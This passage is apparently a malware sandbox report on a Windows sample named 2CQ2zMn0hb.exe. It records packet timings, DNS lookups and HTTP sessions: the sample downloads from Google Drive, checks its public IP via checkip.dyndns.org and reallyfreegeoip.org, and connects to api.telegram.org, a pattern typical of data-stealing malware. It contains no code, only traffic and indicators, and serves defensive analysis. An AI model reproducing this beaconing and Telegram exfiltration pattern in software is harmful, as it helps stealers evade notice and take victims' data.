                                                                                                            Jan 10, 2025 21:54:43.159038067 CET5005780192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:43.160443068 CET5005980192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:43.164268017 CET8050057132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:43.164365053 CET5005780192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:43.165245056 CET8050059132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:43.165343046 CET5005980192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:43.165463924 CET5005980192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:43.170377016 CET8050059132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:43.851001978 CET8050059132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:43.852236986 CET50060443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:43.852296114 CET44350060149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:43.852355003 CET50060443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:43.852653027 CET50060443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:43.852674961 CET44350060149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:43.893431902 CET5005980192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:44.465226889 CET44350060149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:44.467088938 CET50060443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:44.467128992 CET44350060149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:44.467187881 CET50060443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:44.467195988 CET44350060149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:44.897531986 CET44350060149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:44.897660017 CET44350060149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:44.897736073 CET50060443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:44.898070097 CET50060443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:44.900966883 CET5005980192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:44.901655912 CET5006180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:44.905949116 CET8050059132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:44.906029940 CET5005980192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:44.906447887 CET8050061132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:44.909732103 CET5006180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:44.909847975 CET5006180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:44.914674997 CET8050061132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:45.616283894 CET8050061132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:45.620647907 CET50062443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:45.620698929 CET44350062149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:45.620774031 CET50062443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:45.621256113 CET50062443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:45.621278048 CET44350062149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:45.674686909 CET5006180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:46.268475056 CET44350062149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:46.269965887 CET50062443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:46.270032883 CET44350062149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:46.270097971 CET50062443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:46.270112038 CET44350062149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:46.729870081 CET44350062149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:46.729968071 CET44350062149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:46.730022907 CET50062443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:46.730437994 CET50062443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:46.733717918 CET5006180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:46.734483957 CET5006380192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:46.738753080 CET8050061132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:46.738804102 CET5006180192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:46.739270926 CET8050063132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:46.739340067 CET5006380192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:46.739422083 CET5006380192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:46.744155884 CET8050063132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:47.417826891 CET8050063132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:47.419083118 CET50064443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:47.419143915 CET44350064149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:47.419205904 CET50064443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:47.419487000 CET50064443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:47.419502020 CET44350064149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:47.471556902 CET5006380192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:48.055332899 CET44350064149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:48.112205982 CET50064443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:50.129157066 CET50064443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:50.129204035 CET44350064149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:50.129259109 CET50064443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:50.129270077 CET44350064149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:50.540777922 CET44350064149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:50.540862083 CET44350064149.154.167.220192.168.2.5
                                                                                                            Jan 10, 2025 21:54:50.541024923 CET50064443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:50.541301012 CET50064443192.168.2.5149.154.167.220
                                                                                                            Jan 10, 2025 21:54:50.543395042 CET5006380192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:50.544300079 CET5006580192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:50.548384905 CET8050063132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:50.548455000 CET5006380192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:50.549165010 CET8050065132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:50.549254894 CET5006580192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:50.549308062 CET5006580192.168.2.5132.226.247.73
                                                                                                            Jan 10, 2025 21:54:50.554111958 CET8050065132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:51.247606993 CET8050065132.226.247.73192.168.2.5
                                                                                                            Jan 10, 2025 21:54:51.299695015 CET5006580192.168.2.5132.226.247.73
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 10, 2025 21:53:21.756522894 CET5577553192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 21:53:21.763258934 CET53557751.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:22.904962063 CET6281553192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 21:53:22.912096024 CET53628151.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:27.372457981 CET5624153192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 21:53:27.379612923 CET53562411.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:28.684919119 CET6524253192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 21:53:28.692665100 CET53652421.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 21:53:35.028512955 CET5178353192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 21:53:35.035414934 CET53517831.1.1.1192.168.2.5
                                                                                                            Jan 10, 2025 21:54:29.653590918 CET5056253192.168.2.51.1.1.1
                                                                                                            Jan 10, 2025 21:54:29.660320044 CET53505621.1.1.1192.168.2.5
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 21:53:21.756522894 CET192.168.2.51.1.1.10x4486Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:22.904962063 CET192.168.2.51.1.1.10xf5fbStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:27.372457981 CET192.168.2.51.1.1.10x5eadStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:28.684919119 CET192.168.2.51.1.1.10x9f65Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:35.028512955 CET192.168.2.51.1.1.10xcda3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:54:29.653590918 CET192.168.2.51.1.1.10x77afStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 21:53:21.763258934 CET1.1.1.1192.168.2.50x4486No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:22.912096024 CET1.1.1.1192.168.2.50xf5fbNo error (0)drive.usercontent.google.com172.217.18.97A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:27.379612923 CET1.1.1.1192.168.2.50x5eadNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:27.379612923 CET1.1.1.1192.168.2.50x5eadNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:27.379612923 CET1.1.1.1192.168.2.50x5eadNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:27.379612923 CET1.1.1.1192.168.2.50x5eadNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:27.379612923 CET1.1.1.1192.168.2.50x5eadNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:27.379612923 CET1.1.1.1192.168.2.50x5eadNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:28.692665100 CET1.1.1.1192.168.2.50x9f65No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:28.692665100 CET1.1.1.1192.168.2.50x9f65No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:28.692665100 CET1.1.1.1192.168.2.50x9f65No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:28.692665100 CET1.1.1.1192.168.2.50x9f65No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:28.692665100 CET1.1.1.1192.168.2.50x9f65No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:28.692665100 CET1.1.1.1192.168.2.50x9f65No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:28.692665100 CET1.1.1.1192.168.2.50x9f65No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:53:35.035414934 CET1.1.1.1192.168.2.50xcda3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:54:29.660320044 CET1.1.1.1192.168.2.50x77afNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            • drive.google.com
                                                                                                            • drive.usercontent.google.com
                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.549861132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:27.390430927 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:28.090756893 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:27 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 21:53:28.099018097 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 21:53:28.334659100 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:28 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 21:53:34.784805059 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 21:53:34.998574018 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.549919132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:36.153876066 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 21:53:36.826298952 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:36 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.549934132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:38.170341969 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:38.843408108 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:38 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.549948132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:39.747529984 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:40.454317093 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:40 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.549960132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:41.391680956 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:42.072101116 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:41 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.549973132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:43.130877972 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:43.840277910 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:43 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.549986132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:44.839339018 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:45.540389061 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:45 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.549993132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:46.534900904 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:47.217083931 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:47 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.549995132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:48.317394018 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:49.013741970 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:48 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.549997132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:50.178380013 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:50.853566885 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:50 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
